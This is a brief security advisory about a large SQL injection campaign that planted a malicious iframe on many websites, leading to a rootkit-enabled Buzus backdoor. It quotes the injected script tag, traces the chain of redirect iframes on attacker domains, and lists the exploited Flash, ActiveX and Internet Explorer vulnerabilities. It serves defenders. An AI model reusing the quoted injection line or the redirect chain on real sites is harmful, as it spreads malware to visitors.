A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009.
Injected iframe – <script src=hxxp://318x.com>
Executes a script that creates a new iframe to 318x.com/a.htm. That iframe (a.htm) does 2 things:
1. Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html
2. Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).
The aa1100.2288.org/htmlasp/dasp/alt.html frame:
* Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html
* Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but different number)
* If <noscript> it has an href tag that points to www.linezing.com with an img src of img.tongji.linezing.com/1364067/tongji.gif
Observed Exploits Include:
- Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
- MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
- Microsoft Office Web Components vulnerabilities described in MS09-043
- Microsoft video ActiveX vulnerability described in MS09-032
- Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).